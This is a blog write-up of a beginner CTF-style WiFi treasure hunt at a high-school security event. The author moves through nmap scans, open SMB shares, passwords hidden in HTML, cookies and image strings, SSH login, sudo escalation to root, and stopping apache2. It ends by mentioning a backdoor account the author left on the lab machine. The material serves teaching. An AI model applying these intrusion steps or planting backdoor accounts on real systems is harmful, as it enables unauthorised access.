1nterrupt WiFi Treasure Hunt Write-up

I attened a small event designed to get high school students interested in computer security. There was a little CTF-type competition that they hosted on several raspberry pis. The style behind this was that we had a building with two floors. There were five access points around the building that we had to find. Each 'level' gave hints to the next. You had to get the password for the next access point, then find it, connect, and attack the device on it.

So, lets run through this :D

The first access point is X_guest, where the initial target is 10.0.1.1. This access point is open, so we can immediately connect to the system. Lets run a quick port scan.

root@shadow ~$ nmap -sV 10.0.1.1

Starting Nmap 6.47 ( http://nmap.org ) at 2015-01-10 11:27 EST
Nmap scan report for 10.0.1.1
Host is up (0.012s latency).
Not shown: 996 closed ports
PORT    STATE SERVICE     VERSION
22/tcp  open  ssh         OpenSSH 6.0p1 Debian 4+deb7u2 (protocol 2.0)
80/tcp  open  http        Apache httpd 2.2.22 ((Debian))
139/tcp open  netbios-ssn Samba smbd 3.X (workgroup: STAGE1)
445/tcp open  netbios-ssn Samba smbd 3.X (workgroup: STAGE1)
MAC Address: 44:94:FC:F3:01:14 (Netgear,)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 24.53 seconds

So, we see that SMB is running on ports 139 and 445. We can list the shares from this server.

root@shadow ~$ smbclient -L 10.0.1.1
Enter root's password: 
Domain=[STAGE1] OS=[Unix] Server=[Samba 3.6.6]

    Sharename       Type      Comment
    ---------       ----      -------
    files           Disk      Open documents
    IPC$            IPC       IPC Service (ctf01b server)
Domain=[STAGE1] OS=[Unix] Server=[Samba 3.6.6]

    Server               Comment
    ---------            -------
    CTF01                ctf01 server
    CTF01B               ctf01b server

    Workgroup            Master
    ---------            -------
    STAGE1               CTF01B
    WORKGROUP            CTF05B

So, now we know that for the workgroup “STAGE1”, there is the share “files”. We can now try to mount this share.

root@shadow /mnt$ smbclient \\\\CTF01B\\files                      
Enter root's password: 
Domain=[STAGE1] OS=[Unix] Server=[Samba 3.6.6]
smb: \>

Sweet, a SMB shell!
Note: When it asks for “root” password, I just hit enter and it worked. Not sure if it was asking for local or remote root, but either way just a blank password worked...

Now we can list the shared files and directories.

smb: \> ls
  .                                   D        0  Thu Jan  8 23:32:41 2015
  ..                                  D        0  Thu Jan  8 19:05:28 2015
  images                              D        0  Thu Jan  8 23:33:13 2015
  guestWiFi_Disclaimer.pdf            N   969218  Thu Jan  8 23:32:21 2015
  welcome.txt                         N      105  Thu Jan  8 23:32:00 2015
  confidential.txt                    N       51  Thu Jan  8 23:32:00 2015
  mirage.txt                          N        0  Thu Jan  8 23:32:00 2015
  password.txt                        N       27  Thu Jan  8 23:32:00 2015
smb: \> cd images\
smb: \images\> ls
  .                                   D        0  Thu Jan  8 23:33:13 2015
  ..                                  D        0  Thu Jan  8 23:32:41 2015
  XstationLogo_guest.jpg              N   729401  Thu Jan  8 23:33:14 2015

You can get all these files.

smb: \> get password.txt ./password.txt
getting file \password.txt of size 27 as ./password.txt (1.3 KiloBytes/sec) (average 1.3 KiloBytes/sec)

And since I ran the initial smbclient command in /mnt, the files were downloaded to /mnt
Most of these files are just jokes...

root@shadow /mnt$ cat password.txt                                                                                                                                                                            
Ever heard of a honey pot?
root@shadow /mnt$ cat mirage.txt                                                                                                                                                           
Do you really think I'd make it this obvious? :-)

root@shadow /mnt$ cat welcome.txt                                                                                                                                                                                 
Welcome to 1NTERRUPT_WOR v2015.1

We're happy to have you here, but there are no passwords in this file.
root@shadow /mnt$

The important file is guestWiFiDisclaimer.pdf, which gives us the password for Xintranet.

guestWiFiDisclaimer.pdf

Also, since I like to test all possibilites, I tested for some stego on the image “XstationLogo_guest.jpg” in the images directory (which can also be found in the webserver, 10.0.1.1/images, dirbuster found that for me after I did all the samba stuff) in the samba share. I was hesitent at first, because I knew the skill set that this competition was designed for is beginner level, however I took a shot at it anyways. A little easier than I thought, a simple strings gave me this message at the bottom of the file.

==========================
Our revenge is at hand.
There's not a direct path
to the online network, so
I'll have to guide you
through each level.
Get to the X_intranet
network next and look for
the polor bear in the
blizzard.
The password for X_intranet
is uBhENje4.
===========================

Which also gives us the password for X_intranet. That’s the thing with these competitions: There are always multiple ways to solve a problem.

One of the neat things about this particular competition, is the treatment like a real pentest. Instead of staying in one place, there were access points all over the building, so I had to go find the access point for X_intranet. This gives a feeling of a physical pentest, where you are inside a company rather than just focusing on the software aspect.

So, from that image, it gives us a little hint: "look for the polor bear in the blizzard.”

I noted the misspelling of the word ‘polar’, which turned out to be unhelpful.

Now we connected to the X_intranet network, and our next target is 10.0.22.1. A quick port scan gives us the same ports open as before.

We can navigate to the webpage with our browser. But we can see by highlighting that there is hidden text.

Which gives us the password for X_corp.

Also, running stego on the image again gives us

=============================
Great! You should have found
the password to the X_corp
network in the HTML - hiding
in plain sight!
The hints will have to go
deeper or we'll get caught.
Check the comments on the 
X_corp home page for your 
next clue.
=============================

On the X_corp network, there is one host: 10.0.3.1.
22, and 80 are open. The webpage shows a comment:

    <!-- index.html is the default web page, but it's not necessarily the only page. Address what you seek, and you may find it. -->

Navigating to 10.0.3.1/password gives us:

The password for the X_dev network is: X5FS9k10

You'll be one step away from the online network.

If you watch what you eat, then you'll have your way in.

Next on X_dev is 10.0.4.1.

Navigating to 10.0.4.1 with a web browser gives us a page with a picture of a C file in Xcode. However, looking at the source gives us this:

<script type="text/javascript" src="clue.js">

Which if we look at clue.js, we get

function putCookie() {

document.cookie="HiddenSSID_X_online=pass_7E7hUTt2;path=/";
}

Which of course gives us a hidden SSID, and password.

Connecting to X_online give us 10.0.5.1.
Port scan again reveals ports 22, and 80.

Upon connecting to the web server, we see an image of the Computer Fraud and Abuse Act. However, viewing the source of the file, it gives this

<script type="text/javascript" src="clue.js">

Which in turn gives us

function putCookie() {

document.cookie="sshUser_wor123=pass_stopapache2;path=/";
}

So great! We have SSH creds! Note the password saying to “stop apache2”. This means that hopefully once logging in, we will be able to bring apache2 offline.

root@shadow ~$ ssh wor123@10.0.5.1                                             
wor123@10.0.5.1's password: 
Linux ctf05 3.12.35+ #730 PREEMPT Fri Dec 19 18:31:24 GMT 2014 armv6l

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Fri Jan  9 21:16:25 2015 from 10.0.5.237
wor123@ctf05 ~ $ ls
hint  pistore.desktop
wor123@ctf05 ~ $ cat hint

 **************************************************************

take a look at the file owners in /var/www and /var/www/images

use "cd /var/www/" to get to the www directory

use "ls -l" for more detailed file information

**************************************************************

wor123@ctf05 ~ $ 

Hooray! Now, the goal here is to find out who is leaving behind the trail to break in, so we can easily find this by looking in /var/www.

wor123@ctf05 ~ $ ls -l /var/www
total 12
-rw-r--r-- 1 tjones root   84 Jan  2 21:29 clue.js
drwxr-xr-x 2 root   root 4096 Jan  2 21:22 images
-rw-r--r-- 1 root   root  129 Jan  2 21:23 index.html
wor123@ctf05 ~ $ ls -l /var/www/images/
total 208
-rw-r--r-- 1 tjones ctf 209536 Jan  2 21:17 screenshot.jpg
wor123@ctf05 ~ $ 

TJones! Y U DO DIS??

Anyways, there is actually a simple path to root here too.

wor123@ctf05 ~ $ sudo -l
Matching Defaults entries for wor123 on this host:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User wor123 may run the following commands on this host:
    (ALL) NOPASSWD: ALL
wor123@ctf05 ~ $ sudo su
root@ctf05:/home/wor123# whoami;id
root
uid=0(root) gid=0(root) groups=0(root),1001(indiecity)
root@ctf05:/home/wor123# service apache2 stop
[....] Stopping web server: apache2apache2: Could not reliably determine the server's fully qualified domain name, using 127.0.1.1 for ServerName
[ ok waiting ..
root@ctf05:/home/wor123#

And there we go, we also were able to stop apache2, as the password revealed.

Finally, since I am such a nice guy, I left my own little ‘backdoor’ here :)
sup3rb4ckd00r:password

Great intro to infosec challenge. Tons of fun!
The software used to setup the pi’s will also be released open source, so anyone can set up their own competition just like this! I'll update this post when I get info about it.

P.S. I will post my Vulnhub Pegasus write-up soon! I just haven't had time lately to finish writing it!